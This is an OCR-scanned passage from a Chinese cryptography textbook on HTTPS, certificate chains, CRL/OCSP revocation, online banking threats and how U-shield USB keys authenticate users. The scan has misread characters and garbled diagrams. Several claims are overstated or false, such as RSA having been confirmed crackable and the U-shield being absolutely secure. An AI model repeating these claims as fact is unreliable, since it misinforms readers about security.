(2) 目前 个 人 银行 的 专业 版 就 是 这 种 做 法 ,具体 证 书 可 以 用 U 盘 作为 载体 ( 即 U 盾 )。 
大 多 数 网 上 银行 就 是 采取 这 种 方式 。 

https 的 缺点 是 工作 效率 不 高 ,这 是 因为 : 

(1) http 协议 只 需要 简单 的 一 次 请 求 /响应 就 完成 了 信息 获取 ,而 https 需要 有 和 密 钥 和 
确认 加 密 算法 , 单 握手 就 需要 6/7 次 请 求 /响应 。 在 任何 应 用 中 ,过 多 的 请 求 /响应 肯定 影响 
性 能 。 

(2) 接 下 来 具体 的 http 协议 每 一 次 响应 或 者 请 求 , 都 要 求 客户 端 和 服务 端 对 会 话 的 内 
容 做 加 密 / 解 密 。 尽 管 对 称 加密 / 解 密 效 率 比较 高 ,可 是 仍然 要 消耗 过 多 的 CPU。 如 果 
CPU 性 能 比较 低 ,肯定 会 降低 性 能 ,从 而 不 能 对 更 多 的 请 求 提 供 服务 。 

综 上 所 述 ,https 实际 上 就 是 SSL over http, 它 使 用 默认 端口 443 ,而 不 是 像 http 那样 
使 用 端口 80 来 和 TCP/IP 进行 通信 。 

https 协议 使 用 SSL 在 发 送 方 对 原始 数据 进行 加 密 , 然 后 在 接收 方 进行 解密 ,加 密 和 解 
密 需要 发 送 方 和 接收 方 通过 交换 共 知 的 密 钥 来 实现 ,因此 ,所 传送 的 数据 不 容易 被 网 络 黑客 
截获 和 解密 。 然 而 ,加 密 和 解密 过 程 需要 耗费 系统 大 量 的 开销 ,严重 降低 机 器 的 性 能 ,相关 
测试 数据 表明 使 用 https 协议 传输 数据 的 工作 效率 只 有 使 用 http 协议 传输 的 十 分 之 一 。 

假如 为 了 安全 保密 ,将 一 个 网 站 所 有 的 Web 应 用 都 启用 SSL 技术 来 加 密 , 并 使 用 
https 协议 进行 传输 ,那么 该 网 站 的 性 能 和 效率 将 会 大 大 降低 ,而 且 没有 这 个 必要 ,因为 一 般 
来 说 并 不 是 所 有 数据 都 要 求 那么 高 的 安全 保密 级 别 , 所 以 ,只 需 对 那些 涉及 机 密 数 据 的 交互 
处 理 使 用 https 协议 ,就 能 做 到 鱼 与 能 掌 兼 得 。 
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2.7.3 CA 结构 


证 书 管理 有 两 种 常用 的 结构 : CA 的 分 级 系统 和 信任 网 。 

在 分 级 证 明 中 ,顶部 即 根 CA, 它 验证 它 下 面 的 CA, 第 二 级 CA 再 验证 用 户 和 它 下 属 的 
CA, 以 此 类 推 。 

在 信任 网 络 中 ,用 户 的 公用 密 钥 能 以 任何 一 个 为 接收 证 书 的 人 所 熟悉 的 用 户 签名 的 证 
书 形式 提交 。 一 个 企图 获取 另 一 个 公用 密 钥 的 用 户 可 以 从 不 同 来 源 获取 ,并 验证 它们 是 否 
全 部 符合 。 

1. 证 书 链 

如 图 2-23 所 示 ，CA 根 证 书 和 服务 器 证 书 中 间 增 加 一 级 证 书 机 构 , 即 中 间 证 书 , 证 书 的 
产生 和 验证 原理 不 变 , 只 是 增加 一 层 验 证 ,只 要 最 后 能 够 被 任何 信任 的 CA 根 证 书 验证 合法 
即 可 。 









































根 证 书 中 间 证 书 服务 器 证 书 
root.pem inter.pem server.pem 
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信息 信息 信息 
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验证 | | 证 书签 名 证 书签 名 证 书签 名 















































2-23 CA 证 书 链 


(1) 服务 器 证 书 server. pem 的 签发 者 为 中 间 证 书 机 构 inter,inter 根据 证 书 inter. pem 
验证 server. pem 确实 为 自己 签发 的 有 效 证 书 ; 

(2) 中 间 证 书 inter. pem 的 签发 CA 为 root,root 根据 证 书 root. pem 验证 inter. pem 
为 自己 签发 的 合法 证 书 ; 

(3) 客户 端 内 置信 任 CA 的 root. pem 证 书 ,因此 服务 器 证 书 server. pem 的 被 信任 。 

服务 器 证 书 、 中 间 证 书 与 根 证 书 在 一 起 组 合成 一 条 合法 的 证 书 链 ,证 书 链 的 验证 是 自 下 
而 上 的 信任 传递 的 过 程 。 

二 级 证 书 结构 存在 如 下 优势 : 

(1) 减少 根 证 书 结构 的 管理 工作 量 , 可 以 更 高 效 地 进行 证 书 的 审核 与 签发 ; 

(2) 根 证 书 一 般 内 置 在 客户 端 中 , 私 钥 一 般 离线 存储 ,一 旦 私 钥 泄露 , 则 吊销 过 程 非常 
困难 ,无 法 及 时 补救 ; 

(3) 中 间 证 书 结构 的 私 钥 泄露 , 则 可 以 快速 在 线 吊 销 ,并 重新 为 用 户 签发 新 的 证 书 ; 

(4) 证 书 链 在 四 级 以 内 一 般 不 会 对 https 的 性 能 造成 明显 影响 。 

如 图 2-24 所 示 ,证 书 链 具 有 以 下 特点 : 

(1) 同一 本 服务 器 证 书 可 能 存在 多 条 合法 的 证 书 链 。 因 为 证 书 的 生成 和 验证 基础 是 公 
钥 和 私 钥 对 ,如 果 采 用 相同 的 公 钥 和 私 钥 生 成 不 同 的 中 间 证 书 , 那 么 针对 被 签发 者 而 言 ,该 
签发 机 构 都 是 合法 的 CA, 不 同 的 是 中 间 证 书 的 签发 机 构 不 同 。 


第 2 章 密码 学 基础 83 


根 证 书 根 证 书 
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根 证 书 
CA_inter 4 
a ed ht ta 1 
1 
| 中 间 证 书 中 间 证 书 中 间 证 书 1! -相同 的 公 钥 和 私 钥 
| CA_inter 1 CA_inter 2 CA_inter 3 | | 
I le Es 
1 
1 证 书 链 1: cdn.qq.com->inter_1->root_1 1 
服务 器 证 书 服务 出 证 书 | 证 书 链 2 : cdn.qq.com->inter_2->inter_4->root_1 | 
hi seni mt 1 证 书 链 3 : cdn.qq.com->inter_3->root_2 1 














图 2-24 CA 证书 链 的 特点 


(2) 不 同 证 书 链 的 层级 不 一 定 相同 ,可 能 是 二 级 .三 级 或 四 级 证 书 链 。 中 间 证 书 的 签发 
机 构 可 能 是 根 证 书 机 构 也 可 能 是 另 一 个 中 间 证 书 机 构 。 

2. CA 的 主要 功能 

PKI 具有 产生 、 验 证 和 分 发 的 密 钥 、 签 发 和 和 验证、 获取 证 书 、 验 证 证 书 、 保 存 证 书本 地 保 
存 的 证 书 的 获取 、 证 书 的 撤销 、 密 钥 的 恢复 .证书 撤 销 列表 (CRL) 的 获取 、 密 钥 的 更 新 .审计 
以 及 存档 等 功能 。 这 些 功 能 大 部 分 由 PKI 的 核心 组 成 部 分 CA 完成 。 其 中 CA 主要 完成 的 
功能 有 证 书 颁 发 ,证书 更 新 .证 书 和 证 书 撤销 列表 的 公布 .证 书 状 态 的 在 线 查询 ,证 书 认证 和 
制定 政策 等 。 

(1) 证 书 颁发 。 申 请 者 在 CA 的 注册 机 构 进 行 注册 ,申请 证 书 。CA 对 申请 者 进行 审 
核 ,审核 通过 则 生成 证 书 ,颁发 证 书 给 申请 者 。 证 书 的 申请 可 采取 在 线 申 请 和 亲自 到 注册 机 
构 申 请 两 种 方式 。 证 书 的 颁发 也 可 采取 两 种 方式 : 一 种 是 在 线 直接 从 CA 下 载 ; 一 种 是 
CA 将 证 书 制作 成 媒体 (如 IC 卡 ) 后 ,由 申请 者 带 走 。 

(2) 证 书 更 新 。 当 证 书 持 有 者 的 证 书 过 期 、 被 窃取 或 丢失 时 ,可 通过 更 新 证 书 的 方式 ， 
使 其 使 用 新 的 证 书 ,继续 参与 网 上 认证 。 证 书 的 更 新 包括 证 书 的 更 换 和 证 书 的 延期 两 种 情 
况 。 证 书 的 更 换 实际 上 是 重新 颁发 证 书 , 因 此 证 书 更 换 的 过 程 和 证 书 的 申请 流程 基本 一 致 。 
证 书 的 延期 只 是 将 证 书 有 效 期 延长 ,其 签名 和 加 密 信 息 的 公 钥 / 私 钥 没有 改变 。 

(3) 证 书 撤销 。 证 书 持 有 者 可 以 向 CA 申请 撤销 证 书 。CA 通过 认证 核实 可 执行 撤销 
证 书 职责 ,通知 有 关 组 织 和 个 人 ,并 写 和 人 CRL。 

CA 机 构 能 够 签发 证 书 , 同 样 也 存在 机 制 用 于 宣布 以 往 签发 的 证 书 无 效 : 证 书 使 用 者 不 
合法 ,CA 需要 废弃 该 证 书 ; 或 者 私 钥 丢 失 , 使 用 者 申请 让 证 书 无 效 。 主 要 存在 两 类 机 制 : 
CRL 与 OCSP。 

。 CRL(Certificate Revocation List ,证 书 吊销 列表 ) 是 一 个 单独 的 文件 。 该 文件 包含 

了 CA 已 经 吊销 的 证 书 序列 号 (唯一 ) 与 吊销 日 期 ,同时 该 文件 包含 生效 日 期 并 通知 
下 次 更 新 该 文件 的 时 间 , 当然 该 文件 必然 包含 CA 私 钥 的 签名 以 验证 文件 的 合法 
性 。 证书 中 一 般 会 包含 名 为 CRL 分 发 点 (CRL Distribution Point) 的 URL 地 址 , 通 
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知 使 用 者 去 哪里 下 载 对 应 的 CRL 以 校 验证 书 是 否 吊销 。 该 吊销 方式 的 优点 是 不 需 
要 频繁 更 新 ,但 是 不 能 及 时 吊销 证 书 , 因 为 CRL 更 新 时 间 一 般 是 几 天 ,但 这 期 间 可 
能 已 经 造成 了 极 大 损失 。 

。 OCSP(Online Certificate Status Protocol ,证 书 状态 在 线 查 询 协 议 ) 是 一 种 实时 查询 
证 书 是 否 吊销 的 方式 。 请 求 者 发 送 证 书 的 信息 并 请 求 查询 ,服务 器 返回 正常 .吊销 
或 未 知 中 的 任何 一 个 状态 。 证 书 中 一 般 也 会 包含 一 个 OCSP 的 URL 地 址 ,要 求 查 
询 服 务 器 具有 良好 的 性 能 。 部 分 CA 或 大 部 分 的 自 签 CA ( 根 证 书 ) 都 是 未 提供 
CRL 或 OCSP 地 址 的 ,对 于 吊销 证 书 会 是 一 件 非常 麻烦 的 事情 。 

(4) 证 书 和 CRL 的 公布 。CA 通过 LDAP 服务 器 维护 用 户 证 书 和 CRL。 它 向 用 户 提 
供 目录 浏览 服务 ,负责 将 新 签发 的 证 书 或 废止 的 证 书 加 入 到 LDAP 服务 器 上 ,这样 用 户 通 
过 访问 LDAP 服务 器 就 能 够 得 到 其 他 人 的 数字 证 书 或 能 访问 CRL。 

(5) 证 书 状 态 的 在 线 查 询 。 通 常 CRL 的 发 布 为 一 日 一 次 ,CRL 的 状态 同 当前 状态 有 一 
定 的 滞后 。 证 书 状态 的 在 线 查询 通过 向 OCSP 服务 器 发 送 OCSP 查询 包 实现 , 包 中 含有 待 
验证 证 书 的 序列 号 、 验 证 时 间 蕉 ,OCSP 服务 器 返回 证 书 的 当前 状态 并 对 返回 结果 加 以 签 
名 。 在 线 证 书 状 态 查询 比 CRL 更 具有 时 效 性 。 

(6) 证 书 认证 。CA 对 证 书 进行 有 效 性 和 真实 性 的 认证 ,在 实际 操作 中 ,如 果 一 个 CA 
管理 得 用 户 太 多 , 则 很 难得 到 所 有 用 户 的 依赖 并 接受 它 所 发 行 的 所 有 用 户 的 公 钥 证 书 ,而且 
一 个 CA 也 很 难 对 大 量 的 用 户 有 足够 .全 面 的 了 解 ,为 此 需要 采用 一 种 多 CA 分 层 结构 的 系 
统 。 在 多 个 CA 的 系统 中 ,由 特定 CA 发 放 证 书 的 所 有 用 户 组 成 一 个 域 ,同一 个 域 中 的 用 户 
可 以 直接 进行 证 书 交换 和 认证 ,而 不 同 域 中 用 户 的 公 钥 安全 认证 和 递送 需要 通过 建立 一 个 
可 依赖 的 证 书 链 或 证 书 通路 实现 。 跨 域 证 书 的 认证 也 可 通过 交叉 认证 来 实现 ,这 会 大 大 缩 
短信 任 关系 的 路 径 , 提 高 效率 。 

(7) 制定 政策 。 普 通用 户 信任 一 个 CA 除了 它 的 技术 因素 之 外 , 另 一 个 极 重要 的 因素 
就 是 CA 的 政策 。CA 的 政策 是 指 CA 必须 对 信任 它 的 各 方 负 责 , 它 的 责任 大 部 分 体现 在 政 
策 的 制定 和 实施 上 。CA 的 政策 越 公 开 越 好 ,信息 发 布 越 及 时 越 好 。 

CA 的 政策 包含 : CA 私 钥 的 保护 ; 证 书 申请 时 密 钥 对 的 产生 方式 ; 对 用 户 私 钥 的 保 
护 ; CRL 的 更 新 频率 ; 通知 服务 ; 保护 CA 服务 器 ; 审计 与 日 志 检 查 。 


2.8 网 络 银行 支付 安全 


传统 支付 方式 为 柜台 支付 或 银行 卡 支付 。 银 行 卡 是 一 种 内 置 集成 电路 的 芯片 ,芯片 中 
存 有 与 用 户 身份 相关 的 数据 。 银 行 卡 由 专门 的 设备 生产 ,是 不 可 复制 的 硬件 。 银 行 卡 由 合 
法 用 户 随身 携带 ,登录 时 必须 将 银行 卡 搬 入 专用 的 读 卡 器 读 取 其 中 的 信息 ,以 验证 用 户 的 身 
份 。 银 行 卡 传统 的 安全 保障 措施 就 是 用 户 名 和 密码 ,这 是 很 不 安全 的 一 一 容易 被 留 驻 内 存 
的 木马 或 网 络 监听 等 黑客 技术 窃取 。 

近年 来 支付 更 加 方便 和 安全 的 网 络 支付 日 益 普及 ,但 现在 的 网 络 支付 中 存在 着 很 多 缺陷 : 

(1) 网 络 数 据 流 分 析 。 在 用 户 和 银行 交易 的 过 程 中 ,第 三 方 可 通过 各 种 方法 截获 数据 
流 , 分 析 数 据 中 的 信息 从 而 得 到 用 户 的 信息 。 
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(2) 木马 窃听 。 用 户 计算 机 中 了 病毒 或 者 木马 之 后 ,计算 机 被 监听 ,用户 和 银行 交易 的 
信息 被 木马 记录 ,用 户 的 信息 被 盗 取 。 

(3) 穷 举 攻击 。 攻 击 者 使 用 有 意义 的 数字 作为 密码 来 不 断 尝试 持 卡 人 的 密码 。 如 果 持 
卡 人 的 密码 是 未 经 过 改动 的 初始 密码 或 一 个 特殊 .容易 被 分 析 的 数字 , 则 密码 很 容易 被 攻击 
者 穷 举 出 来 。 

简单 密码 包括 : 身份 证 号 码 中 连续 的 6 位 数字 出 生年 月 日 3 组 数字 的 任意 组 合 .连续 
5 位 以 上 ( 含 ) 数 字 相 同 的 .6 位 连续 数字 递增 或 递减 的 排列 组 合 。 银 行 统一 集中 开 卡 的 密码 
多 为 6 位 连续 数字 ,如 111111 等 。 

因为 ATM 只 有 数字 键盘 ,所 以 很 多 银行 卡 的 密码 都 是 6 位 数字 密码 ,密码 空间 为 10' 
(100 万 ) ,理论 上 讲 是 可 以 暴力 破解 的 。 当 然 实际 上 银行 的 密码 不 仅仅 是 通过 算法 的 安全 
性 来 保密 的 ,而 是 通过 保密 制度 来 保密 的 。 也 就 是 说 ,银行 把 密码 在 银行 的 安全 性 建立 在 密 
文 不 被 窃取 的 前 提 下 ,这 和 通常 IT 网 站 所 认为 的 不 一 样 。 

银行 要 求 密码 必须 以 密 文 形式 存放 。 密 码 根据 不 同 的 密 钥 组 合生 成 ,相同 密码 不 同 的 
客户 、 同 一 客户 不 同 账 号 生成 的 密 文 密码 都 是 不 同 的 ,例如 可 能 客户 编号 和 账号 就 是 组 合成 
密 钥 的 一 部 分 ,并 且 这 两 者 可 以 组 成 唯一 索引 ,保证 不 重复 ; 所 有 的 存 人 数据 库 的 密码 密 文 
的 加 密 算 法 至 少 能 保证 在 当前 是 不 可 逆 的 ; 在 不 知道 算法 的 情况 下 ,根据 密 文 想 穷 举 计算 
不 可 行 ; 当前 账户 依存 的 媒体 一 般 是 银行 卡 等 ,在 银行 卡 里 不 只 包含 账号 ,还 有 一 些 校 验 
位 ,只 有 账号 密码 ,银行 卡 还 是 没 法 单独 使 用 。 所 以 保管 好 银行 卡 十 分 重要 。 

银行 保密 制度 规定 银行 中 只 有 极 少数 人 能 直接 接触 储户 密码 ( 密 文 ) ,而 这 些 人 的 身份 
和 操作 全 部 会 被 记录 在 案 ,就 算 离职 ,这 些 信息 也 不 会 被 清除 ; 涉及 存储 及 使 用 这 些 信 息 的 
电脑 网 络 物理 隔离 ,操作 终端 有 摄像 头 全 程 监控 ,操作 者 别 想 着 抄 下 来 ; 攻击 银行 或 者 金融 
机 构 是 属于 犯罪 行为 。 

但 攻击 者 仍然 可 以 通过 撞 库 等 方式 获取 密码 。 撞 库 指 黑客 通过 收集 互联 网 已 泄露 的 用 
户 和 密码 信息 ,生成 对 应 的 字典 表 ,尝试 批量 登录 其 他 网 站 后 ,得 到 一 系列 可 以 登录 的 用 户 
信息 。 

很 多 用 户 在 不 同 网 站 使 用 的 是 相同 的 账号 密码 ,因此 黑客 可 以 通过 获取 用 户 在 A 网 站 
的 账户 从 而 尝试 登录 B 网 址 ,这 就 是 撞 库 攻击 。2014 年 12 月 25 日 ,12306 网 站 用 户 信息 在 
互联 网 上 疯 传 。 对 此 12306 官方 网 站 称 ,网 上 泄露 的 用 户 信息 系 经 其 他 网 站 或 渠道 流出 。 
据悉 此 次 泄露 的 用 户 数据 不 少 于 131 653 条 。 该 批 数据 基本 确认 为 黑客 通过 撞 库 攻击 所 
获得 。 

(4) 网 络 钓鱼 : 第 三 方 利用 银行 的 身份 给 用 户 发 信息 ,要 求 用 户 提供 账号 和 密码 ,如 果 
用 户 提供 了 的 话 就 会 泄露 自己 的 信息 。 或 者 是 第 三 方 假冒 银行 或 者 交易 的 网 站 ,在 没有 认 
真 辨 别 的 情况 下 ,用 户 很 容易 上 当 从 而 泄露 自己 的 信息 。 

为 了 提高 网 络 支付 安全 性 ,硬件 认证 、 指 纹 认证 .虹膜 认证 \ 人 脸 认证 等 多 种 认证 方式 应 
运 而 生 。 


2.8.1 U 盾 定义 


硬件 认证 的 代表 是 U 盾 。U 盾 即 移动 数字 证 书 USB key, 它 存放 着 个 人 的 数字 证 书 ， 
并 不 可 读 取 。 是 目前 网 上 银行 客户 端 安全 级 别 最 高 的 一 种 安全 工具 。 同 样 ,银行 也 记录 着 
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你 的 数字 证 书 。 

U 盾 (USB Key) 外 形 酷似 U 盘 , 像 一 面 盾牌 ,时 刻 保护 着 网 上 银行 的 资金 安全 。U 盾 
采用 了 目前 国际 领先 的 信息 安全 技术 ,核心 硬件 模块 采用 智能 卡 CPU 芯片 ,内 部 结构 由 
CPU 及 加 密 逻 辑 .RAM、ROM、EEPROM 和 1/0O 五 部 分 组 成 ,是 一 个 具有 安全 体系 的 小 型 
计算 机 。 除 了 硬件 ,安全 实现 完全 取决 于 技术 含量 极 高 的 智能 卡 芯片 操作 系统 (COS) ,该 操 
作 系 统 就 像 DOS、Windows 等 操作 系统 一 样 ,管理 着 与 信息 安全 密切 相关 的 各 种 数据 、 密 钥 
和 文件 ,并 控制 各 种 安全 服务 。 

从 技术 角度 看 ,U 盾 是 用 于 网 上 银行 电子 签名 和 数字 认证 的 工具 , 它 采 用 1024 位 非 对 
称 密 钥 算法 对 网 上 数据 进行 加 密 、 解 密 和 数字 签名 ,确保 网 上 交易 的 保密 性 、 真 实 性 、 完 整 
性 、 不 可 和 否认 性 。 

U 盾 中 装 有 数字 证 书 ,数字 证 书 是 由 可 信任 的 第 三 方 认证 机 CA 颁发 的 一 组 包含 用 户 
身份 信息 ( 密 钥 ) 的 数据 结构 ,PKI 体系 通过 采用 加 密 算法 构建 了 一 套 完善 的 流程 ,保证 数字 
证 书 持 有 人 的 身份 安全 。 唯 一 不 同 的 是 ,你 不 会 把 U 盾 24 小 时 放 在 USB 接口 上 ,要 用 的 
时 候 才 会 插 上 U 盾 , 用 完 马 上 把 U 盾 拔 出 。 而 这 个 过 程 时 间 是 非常 短 的 。 就 算 你 被 最 出 色 
的 黑客 眶 上 了 或 中 了 最 新 款 的 病毒 木马 等 ,也 没 可 能 在 这 么 短 的 时 间 内 对 你 的 U 盾 证 书 进 
行 解密 并 复制 出 来 。1024 位 加 密 的 证 书 除非 知道 密码 否则 暴力 破解 简直 是 天 方 夜 谭 。 没 
有 密码 ,对方 就 算 远 程 登录 到 你 的 机 器 也 不 可 能 把 你 的 证 书 复 制 到 他 的 机 器 上 。 

使 用 U 盾 可 以 保障 数字 证 书 无 法 被 复制 ,所 有 密 钥 运算 在 U 盾 中 实现 ,用 户 密 钥 不 在 
计算 机 内 存 出 现 也 不 在 网 络 中 传播 ,只 有 U 盾 的 持 有 人 才能 够 对 数字 证 书 进行 操作 ,因此 
安全 性 有 了 保障 。 

使 用 U 盾 前 ,一 般 都 要 安装 驱动 ,使 U 盾 能 正常 工作 。 当 用 户 需 要 交易 向 银行 提交 订 
单 要 求 支付 时 ,这 时 就 需要 验证 用 户 的 身份 ,系统 提示 用 户 插入 U 盾 , 并 输入 U 盾 的 密码 ， 
系统 会 在 后 台 验 证 (用 户 看 不 到 该 过 程 过 程 ) ,一 经 验证 通过 ,用 户 就 可 以 使 用 继续 输入 网 上 
支付 密码 和 验证 码 , 验 证 都 正确 后 交易 就 完成 。 

U 盾 保 证 交易 安全 的 措施 有 : 

(1) 硬件 PIN 码 保护 。U 盾 使 用 以 物理 媒体 为 基础 的 个 人 客户 证 书 ,建立 基于 公 钥 
PKI 技术 的 个 人 证 书 认证 体系 。 用 户 需 要 同时 取得 用 户 的 U 盾 硬 件 以 及 用 户 的 PIN 码 
(U 盾 密 码 ) , 才 可 以 登录 系统 。 即 使 用 户 的 PIN 码 泄露 ,只 要 U 盾 没 有 丢失 ,合法 用 户 的 身 
份 就 不 会 被 仿冒 ; 如 果 用 户 U 盾 丢 失 , 其 他 人 不 知道 用 户 的 PIN 码 , 也 是 无 法 假冒 合法 用 
户 的 身份 。 因 此 只 要 登录 卡号 .登录 密码 `U 盾 和 U 盾 密 码 不 同时 泄露 给 同一 个 人 ,就 可 以 
放心 安全 地 使 用 网 上 银行 。 

(2) 安全 的 密 钥 存放 。U 盾 具 有 硬件 随机 数 发 生 器 ,对 称 密 钥 完全 在 硬件 内 生成 并 存 
储 于 内 部 的 智能 芯片 中 ,用 户 无 法 从 外 部 直接 读 取 。 硬 件 提供 的 加 解密 算法 完全 在 加 密 硬 
件 内 运行 ,对 密 钥 文件 的 读 写 和 修改 都 必须 由 U 盾 内 部 的 CPU 调用 相应 的 程序 文件 执行 ， 
能 够 保证 密 钥 不 出 硬件 ,从 而 在 U 盾 接 口 的 外 面 ,没有 任何 一 条 指令 能 对 密 钥 区 的 内 容 进 
行 读 取 \ 修 改 、 更 新 和 删除 ,这 保证 了 黑客 无 法 利用 非法 程序 修改 密 钥 。 

(3) 双 密 钥 密 码 体 制 。 为 了 提高 交易 的 安全 ,U 盾 采用 了 双 钥 密码 体制 保证 安全 性 ,在 
U 盾 初始 化 的 时 候 , 先 将 密码 算法 程序 烧 制 在 ROM 中 ,然后 通过 产生 公私 密 钥 对 的 程序 生 
成 一 对 公私 密 钥 。 公 私密 钥 产 生 后 , 密 钥 可 以 导出 到 U 盾 外 ,而 私 钥 则 存储 于 密 钥 区 ,不 允 
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许 外 部 访问 。 因 此 你 的 数字 证 书 有 一 对 密 钥 : 一 个 是 在 U 盾 里 的 私 钥 , 一 个 是 在 银行 的 公 
钥 。 进 行 数 字 签 名 时 以 及 非 对 称 解密 运算 时 ,凡是 有 私 钥 参 与 的 密码 运算 只 在 芯片 内 部 完 
成 ,全 程 私 钥 可 以 不 出 U 盾 媒 体 , 从 而 保证 以 U 盾 为 存储 媒体 的 数字 证 书 认证 在 安全 上 无 
懈 可 击 。 

(4) 硬件 实现 加 密 算法 。U 盾 内 置 CPU 或 智能 卡 芯片 ,可 以 实现 数据 摘要 数据 加 解 
密 和 签名 的 各 种 算法 。 加 解密 运算 在 U 盾 内 进行 ,保证 用 户 密 钥 不 会 出 现在 计算 机 内 
存 中 。 


2.8.2 U 盾 工作 原理 


U 盾 使 用 基于 PKI 的 数字 证 书 认证 模式 进行 银行 和 客户 身份 的 双向 认证 来 保证 交易 
安全 。 

1. 基于 冲击 -响应 的 认证 模式 

U 盾 内 置 RSA 算法 ,初始 化 时 ,预先 在 U 盾 和 服务 器 中 存储 一 个 证 明 用 户 身份 的 密 
钥 对 。 

当 Alice 尝试 进行 网 上 交易 时 ,需要 在 网 络 上 验证 用 户 Alice 身份 : 先 由 客户 端 Alice 
向 服务 器 Bank 发 出 一 个 验证 请 求 。Bank 接 到 此 请 求 后 向 你 发 送 由 时 间 字 符 串 、 地 址 字符 
串 、 交 易 信 息 字符 串 、 防 重 放 攻击 字符 串 组 合 在 一 起 进行 加 密 后 得 到 的 随机 字符 串 strA ,并 
回 传 给 Alice 的 器 盾 , 此 为 冲击 。 

U 盾 使 用 strA 与 存储 在 U 盾 中 的 密 钥 进行 RSA 运算 得 到 一 个 运算 结果 strB, 作 为 认 
证 证 据 传 送 给 服务 器 ,此 为 响应 。 

与 此 同时 ,服务 器 使 用 随机 数 strA 与 存储 在 服务 器 数据 库 中 的 该 客户 密 钥 进行 RSA 
运算 ,如 果 服 务 器 的 运算 结果 与 客户 端 传 回 的 响应 结果 相同 , 则 认为 客户 端 是 一 个 合法 用 
户 ,完成 对 客户 身份 的 认证 ,交易 便 可 以 完成 ; 如 果 不 一 致 便 认为 你 不 合法 ,交易 便 会 失败 。 

理论 上 不 同 的 字符 串 strA 不 会 得 出 相同 的 字符 串 strB, 即 一 个 字符 串 strA 对 应 一 个 
唯一 的 字符 串 strB; 字符 串 strB 和 字符 串 strA 无 法 得 出 你 的 数字 证 书 , 而 且 U 盾 具 有 不 
可 读 取 性 ,所 以 任何 人 都 无 法 获得 你 的 数字 证 书 ; 并 且 银 行 每 次 都 会 发 不 同 的 防 重 放 字 符 
串 ( 随 机 字符 串 ) 和 时 间 字 符 串 ,所 以 当 一 次 交易 完成 后 , 刚 发 出 的 strA 字符 串 便 不 再 有 效 。 
综 上 所 述 ,理论 上 U 盾 是 绝对 安全 的 。 理 论 上 发 生 伪造 概率 大 约 为 1/2”。 

该 模式 类 似 于 双向 认证 的 TLSCSSL) 或 者 其 他 用 到 RSA 的 双向 证 书 验证 。 具 体 步 骤 为 ， 

(1) Alice 在 客户 端 插入 U 盾 , 输 入 PIN 码 。 

(2) Bank( 服 务 器 端 ) 检 查 PIN 码 是 否 和 UU 盾 对 应 ,成 功 则 执行 下 一 步 ; 否则 拒绝 服务 。 

(3) Bank 收 到 PIN 码 后 查找 对 应 的 公 钥 ,给 U 盾 ( 客 户 端 ) 一 个 冲击 , 它 包 含 一 个 随机 
数 , 以 及 该 随机 数 的 Hash 值 ,它们 都 由 U 盾 公 钥 加 密 , 这 样 就 可 以 保证 只 有 U 盾 能 解密 这 
个 冲击 。 这 是 一 种 典型 的 非 对 称 加 密 用 法 。 

(4) U 盾 计 算 该 随机 数 的 Hash 值 ,并 和 用 私 钥 解 出 的 Hash 值 比较 ,两 者 相同 后 , 便 
可 确认 银行 的 身份 正确 和 数据 完整 性 (数据 在 传输 过 程 中 没有 被 算 改 ) ,实现 Bank 身份 
认证 。 

(5) 器 盾 以 一 个 只 有 U 盾 和 Bank 知道 的 算法 (U 盾 初 始 化 时 选 定 ) ,利用 这 个 随机 数 
和 一 些 其 他 信息 ,生成 响应 和 相应 的 Hash 值 ,再 用 私 钥 加 密 后 发 回 Bank。 这 是 典型 的 非 
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对 称 加 密 的 签名 用 法 ,用 于 保证 Alice 不 可 抵赖 。 

(6) Bank 和 (4) 同 步 以 相同 的 算法 计算 该 响应 。 

(7) Bank 用 U 盾 公 钥 解 密 (4) ,比较 和 (5) 的 响应 是 否 相 同 , 相 同 的 话 Alice 的 身份 也 
就 确定 了 ,完成 Alice 身份 认证 ,银行 执行 具体 银行 业务 ; 否则 拒绝 服务 。 

该 过 程 进 行 了 Alice 和 Bank 双方 身份 认证 ,实现 了 保密 传输 。 至 于 私 钥 的 保密 性 则 由 
U 盾 来 实现 。U 盾 的 控制 芯片 被 设计 为 只 能 写 和 证书, 不 能 读 取 证 书 , 并 且 所 有 利用 证 书 
进行 的 运算 都 在 U 盾 中 进行 。 所 以 ,只 能 从 U 盾 读 出 运算 结果 。 

2. 基于 PKI 的 数字 证 书 认证 模式 

冲击 -响应 模式 可 以 保证 用 户 身 份 不 被 仿冒 ,但 无 法 保证 认证 时 数据 在 网 络 传输 过 程 中 
的 安全 。 通 过 在 U 盾 中 内 置 数字 证 书 , 采 用 上 节 介 绍 的 基于 PKI 的 数字 证 书 认证 方式 可 以 
有 效 保证 用 户 的 身份 安全 和 数据 传输 安全 。 

由 于 U 盾 具 有 安全 可 靠 ,便于 携带 、 使 用 方便 、 成 本 低廉 的 优点 ,加 上 PKI 体系 完善 的 
数据 保护 机 制 ,使 用 U 盾 存储 数字 证 书 的 认证 方式 已 经 成 为 目前 主要 的 认证 模式 。 


2.9 国产 密码 算法 


密码 算法 是 保障 网 络 信息 安全 的 核心 技术 ,在 网 络 信息 安全 中 发 挥 着 至 关 重 要 的 作用 ， 
主要 用 于 网 络 身份 认证 以 及 数据 存储 传输 的 保密 ,是 金融 服务 等 关键 领域 实现 用 户 身份 认 
证 、 信 息 传输 加 密 、 保 障 交 易 及 用 户 数据 安全 的 关键 技术 保障 措施 。 

目前 我 国 网 银 支付 等 系统 的 密码 应 用 中 ,存在 着 两 方面 的 问题 : 一 是 我 国 银行 业 核 心 
领域 长 期 以 来 都 是 沿用 3DES、SHA 一 1、RSA 等 国际 通用 的 商用 密码 算法 体系 及 相关 标准 
(美国 国家 安全 局 发 布 ) ,国际 权威 的 密码 机 构 已 确认 RSA 算法 不 再 安全 ,存在 安全 漏洞 ,可 
以 被 破解 ; 二 是 密码 应 用 体系 存在 安全 隐患 ,当前 网 银 等 系统 中 采用 的 安全 协议 和 加 密 算 
法 均 为 国外 制定 ,密码 应 用 的 关键 环节 存在 着 不 可 控 因 素 , 一 旦 被 利用 攻击 ,将 对 我 国 的 金 
融 安全 造成 重大 冲击 。 

我 国政 府 高 度 重视 密码 算法 国产 化 工作 。 为 了 从 根本 上 摆脱 对 国外 密码 技术 和 产品 的 
过 度 依赖 ,国家 商用 密码 管理 局 组 织 制定 了 一 系列 我 国 自主 研发 的 密码 算法 ,包括 SM2、 
SM3、SM4、SM9 算法 等 ,并 于 2012 年 陆续 公布 了 相关 算法 标准 。 

国产 密码 算法 (简称 国 密 算 法 ) 是 指 国家 密码 局 认定 的 国产 商用 密码 算法 ,主要 有 
